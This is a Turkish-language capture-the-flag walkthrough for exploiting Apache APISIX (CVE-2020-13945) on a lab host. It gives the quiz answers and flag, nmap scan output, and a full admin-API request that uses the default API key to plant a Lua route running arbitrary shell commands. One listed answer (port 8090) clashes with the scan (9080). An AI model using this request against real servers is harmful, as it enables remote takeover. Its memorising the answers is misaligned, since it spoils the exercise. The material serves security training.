# Hack APIs! Apache APISIX


**Açıklama**:

Web Servislerinde her zaman web uygulamasının kendi zaafiyetli olmaz. Web uygulamasının zaafiyetli olduğu durumlarla özellikle açık bulunduktan sonra patch yayınlanana veya sistemler upgrade edilene kadar çoğunlukla 1-2 hafta web uygulamaları zaafiyetli kaldır. Zaafiyetli web uygulamalarını çalıştıran domain isimlerini shodan vb. arama motorları ile bulabilirsiniz. 

Pentestlerde sıklıkla karşılaşılan diğer durum Web App'in yazıldığı API'nin zaafiyetli olmasıdır. Eğer kod yazıldıktan sonra API'de açık bulunduysa ve bu güncellenmediyse belirli durumlarda API'deki açık kullanılarak da sisteme girilebilir. Bugün Apache APISIX API'si kullanılarak yazılan bir sisteme sızmaya çalışacaksınız.


Apache APISIX, tüm API'leriniz ve mikro hizmetleriniz için üstün performans, güvenlik, açık kaynak ve ölçeklenebilir platform sunan, bulutta yerel bir mikro hizmetler API ağ geçididir.  Apache APISIX, Nginx ve etcd'ye dayanmaktadır.


**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Çalışan zaafiyetli servisin versiyonunu bulmak.
- Zaafiyetli servisin CVE ID'sini bulmak.
- Server'ı ele geçirmek.

**Flags**:
- Serverda açık olan toplam port sayısı?
    - answer: **3**
- Vulnerable servisin port numarası?
    - answer: **8090**
- Vulnerable web servisinin ismi?
    - answer: **OpenResty web app server**
- CVE versiyonu?
    - answer: **CVE-2020-13945**
- flag.txt?
    - answer: **CyberPath{UG94FPppg5Qx9MaH}**

## **Solution**:

### **Enum**:

```bash
attacker@cyberpath:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Videos
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 545  bytes 36834 (36.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 366  bytes 765700 (765.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 781  bytes 789789 (789.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 781  bytes 789789 (789.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.48 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-08 11:58 UTC
Nmap scan report for apisix_apisix_1.apisix_internal_network (10.0.0.48)
Host is up (0.000073s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE             VERSION
9080/tcp open  http                OpenResty web app server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: APISIX/2.11.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9092/tcp open  http                OpenResty web app server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: openresty
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9443/tcp open  ssl/tungsten-https?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.58 seconds
attacker@cyberpath:~$ 
```

### **Explotation**:

- Lets visit `http://10.0.0.48:9080/`:

    ![](1.PNG)

- Open Burp:

    ![](2.PNG)

- Open repeater:

    ![](3.PNG)

- Following request will create evil router to execute arbitrary commands on remote server:

```
POST /apisix/admin/routes HTTP/1.1
Host: 10.0.0.48:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}
```

- Send our request with burp repeater:

    ![](4.PNG)
    ![](5.PNG)

- Our evil router succesfully created! Now we can execute any command on server like `http://10.0.0.48:9080/attack?cmd=id`
    ![](6.PNG)
    ![](7.PNG)
    ![](8.PNG)